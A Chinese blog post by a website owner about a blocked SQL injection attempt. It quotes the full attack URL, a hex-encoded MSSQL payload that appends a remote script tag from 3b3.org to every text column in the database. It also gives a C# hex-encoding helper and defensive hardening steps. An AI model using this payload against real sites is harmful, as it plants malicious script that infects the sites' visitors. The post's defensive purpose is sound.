建议大家封锁这个IP,俺百度了一下,发现也有类似的人被攻击。还好,俺的查询语句都是采用参数,如果是拼凑的话,估计惨了。
这也给了俺们一个教训,就是当你拼凑sql后不要有侥幸心理。
这是如下的链接地址:
http://www.kilonet.cn/web/Info.aspx?g=info&c=CT0147&id=200811240069';DeCLaRE@S NvArCHaR(4000);SeT@S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063006C0061007200650020005400610062006C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A006500630074007300200041002C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E00580074007900700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E007600650072007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F003300620033002E006F00720067002F0063002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200aS NvArChAR(4000));ExEc(@S);--
其实这个网站俺基本上都不去管了,因为没时间去完善和打理它,俺加了在线人的活动记录,可惜没保存到日志里。准备有空把日志完善下。免得不明不白地中招。
转换后的代码是:
这是查询这个IP的资料
- 74.222.6.95
- ·本站主数据: 美国
- ·本站辅数据: 还没人提交数据
- ·参考数据一: 美国
- ·参考数据二: 美国
黑客代码SQL注入部分生成:
///字符串转换为16进制
///using System.Text;
///using Microsoft.VisualBasic;
/// </summary>
/// <param name="Data"></param>
/// <returns></returns>
static string ToHexString(string Data)
{
StringBuilder sb = new StringBuilder("0x");
foreach (char c in Data)
{
sb.Append(Conversion.Hex((int)c)).Append("00");
}
return sb.ToString();
}
四步堵死3b3.org c.js注入
2、新建一个public权限数据库用户,并用这个用户访问数据库
3、去掉角色public对sysobjects与syscolumns对象的select访问权限
[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”
4、通过以下代码检测(失败表示权限正确):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
在服务器的IIS中,找到这个被挂马的网站属性,主目录中―配置中---找到.asp及.aspx的影射,将里面的中的HEAD操作与TRACE操作删除,只保留GET与POST就可以解决,
注意删除HEAD操作与TRACE操作完全不会影响正常的网站访问.正常的网站并不需要这两个操作